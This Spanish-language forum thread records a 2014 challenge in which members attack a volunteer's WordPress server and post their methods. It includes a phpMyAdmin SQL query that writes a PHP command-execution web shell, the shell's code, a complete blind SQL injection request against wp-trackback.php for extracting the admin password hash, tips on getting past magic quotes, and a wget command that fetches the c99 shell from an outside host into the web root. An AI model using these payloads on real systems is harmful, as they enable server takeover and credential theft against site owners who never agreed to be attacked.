Hack my server II

dRak0 · 2 Agosto 2014, 00:37 AM

dimitrix , saca los permisos ... Danos un poco mas de tiempo. Ando en algo. Dejalo sin permisos.

dimitrix · 2 Agosto 2014, 00:44 AM

Cita de: ret2libc en 2 Agosto 2014, 00:37 AM
dimitrix , saca los permisos ... Danos un poco mas de tiempo. Ando en algo. Dejalo sin permisos.

Tranquilo, sólo puse el WP como tenía que estar, nada más xD

De ahí a que escalen...

xustyx · 2 Agosto 2014, 00:46 AM

Pues a sido un poco lamer por que como esta el phpmyadmin abierto y puediendo meter sql a saco es facil.

Nada mas decir que has dado una carpeta con files he pensado en varias y ma dao por buscar la famosa uploads que no existia y de repente lista.

Despues desde phpmyadmin he metido la siguiente select:

Código (sql) [Seleccionar]

SELECT '<?php if(isset($_REQUEST[\"cmd\"])){ $cmd = ($_REQUEST[\"cmd\"]);system($cmd);die;}?>'
INTO OUTFILE  '/var/www/wp-content/uploads/c.php'

Lo que hace es crear un fichero php con el siguiente contenido:

Código (php) [Seleccionar]


<?php 
if(isset($_REQUEST["cmd"])){
   $cmd = ($_REQUEST["cmd"]);
   system($cmd);
   die;
}
?>

Y nada una cmd, que podria haber sido una c99 codeada o lo que quisiera... pero claro con phpmyadmin abierto y permisos de escritura.

Pero bueno antes de que pusieras permisos me tirao un rato intentando colar la libreria UDF pero no ha habido suerte... he creado las funciones base64 y copiado a tmp el lib*.so para despues intentar como pudiese apuntar que la carpeta de plugins de mysql fuera tmp pero nada

WHK · 2 Agosto 2014, 00:53 AM

Vamos, no era necesario subir una shell para acceder al sistema y ejecutar código, solo con el wordpress como está lo puedes hacer, de hecho nunca fue necesario ponerle un phpmyadmin, bastaba con las mismas fallas del wordpress, al ponerle ses phpmyadmin mataste la emoción.

WHK · 2 Agosto 2014, 00:56 AM

Cita de: WINTX en 2 Agosto 2014, 00:10 AM
Que asco dais D: iros de aquí eso no vale ABUSONES!!

jajajajaja esque a veces uno se aburre pos xD

xustyx · 2 Agosto 2014, 01:02 AM

Cita de: WHK en 2 Agosto 2014, 00:53 AM
Vamos, no era necesario subir una shell para acceder al sistema y ejecutar código, solo con el wordpress como está lo puedes hacer, de hecho nunca fue necesario ponerle un phpmyadmin, bastaba con las mismas fallas del wordpress, al ponerle ses phpmyadmin mataste la emoción.

Yaps por eso digo... pero si en teoria con las iSql de wordpress tambien se podria haber realizado. (O cualquier cosa que permitiese escribir).

PD: Alguien ha sufrido estress despues de utilizar un puto teclao peor que el de una blackberry?

MinusFour · 2 Agosto 2014, 01:05 AM

Puff, todo por el SQL xD y yo buscando donde colarme en el wordpress LOL.

dRak0 · 2 Agosto 2014, 01:12 AM

Borra los permisos y la shell. Se va la gracia sino. Igual , aprendi algo nuevo , lo cual era el objetivo de esto.

WHK · 2 Agosto 2014, 01:12 AM

Estoy obteniendo el hash con la clave del primer usuario de la tabla de usuarios caracter por caracter:

Código [Seleccionar]

POST /wp-trackback.php?p=1 HTTP/1.1
Connection: close
Host: web.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 139

charset=UTF-7&title= -- a&url= -- a&excerpt= -- a&blog_name=a%2bACc-) union select user_pass from wp_users where ID=1 and SUBTRING(user_pass, 1, 1)="a" limit 1 -- -

Luego cambio la letra "a" por "b", c d e f g h i, etc, hasta obtener el hash completo ya que cuando el select está bien muestra un mensaje que dice que el post está duplicado pero cuando hay un error el script continua y aparece un error de sql sobre el insert

asi que con substring puedes ir devolviendo verdadero o falso cuando encuentres un carácter válido en el hash de la contraseña, luego a loguearse y luego a ejecutar el código arbitrario o usar la librería de backups vulnerable del wordpress para obtener datos sensibles.

PD: php usa magic quotes, por eso no funcionan las inyecciones con comillas, para evadir eso usamos concat() y char().

MinusFour · 2 Agosto 2014, 01:45 AM

Como evades las magic quotes con concat() y char()???

Creo que es lo único que me haría falta para subir la shell lol..

El servidor tiene el puerto 80 hacia afuera abierto, puedo usar wget.

Monte una shell ahí con:

Código [Seleccionar]

wget http://www.c99txt.net/s/c99.txt -P /var/www/wp-content/uploads -O c99.php

Así que pues ahí esta la shell en http://web/wp-content/uploads/c99.php. Utilize el script de c.php que habían puesto ahí... y yo se que hubiera sido más fácil si hubiera hecho el query pero así si encuentro como explotar la otra vulnerabilidad no hubiese necesidad de usar el SQL xD.